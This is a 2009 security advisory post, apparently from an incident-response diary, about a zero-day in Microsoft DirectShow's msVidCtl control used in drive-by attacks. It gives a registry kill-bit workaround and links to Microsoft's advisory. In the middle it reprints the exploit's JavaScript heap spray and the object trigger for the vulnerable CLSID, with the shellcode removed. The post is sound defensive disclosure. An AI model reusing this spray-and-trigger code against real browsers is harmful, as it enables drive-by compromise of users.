0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06. Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)
8 comment(s)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.

A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

 

 

UPDATE July 6, 2009 19:00 UTC

Microsoft have released an advisory for the exploit, it can be found here :
http://www.microsoft.com/technet/security/advisory/972890.mspx

In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/

 

 

Keywords: msVidCtl zero day
8 comment(s)

Comments

Please note that there is a typo in the CSIS link embedded in the text, it has a double "http://". The correct URL is http://www.csis.dk/en/news/news.asp?tekstID=799
Thanks, fixed
Hi,
Can We Get The English Version For The Same
Google does a fair job:

http://translate.google.com/translate?prev=hp&hl=en&js=n&u=http%3A%2F%2Fwww.csis.dk%2Fdk%2Fnyheder%2Fnyheder.asp%3FtekstID%3D799&sl=da&tl=en&history_state0=
Hi,
Can We Get The English Version For The Same
Thanks Stephen.
Thanks Stephen.
Microsoft has issued an advisory, here:

http://www.microsoft.com/technet/security/advisory/972890.mspx

This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.

Diary Archives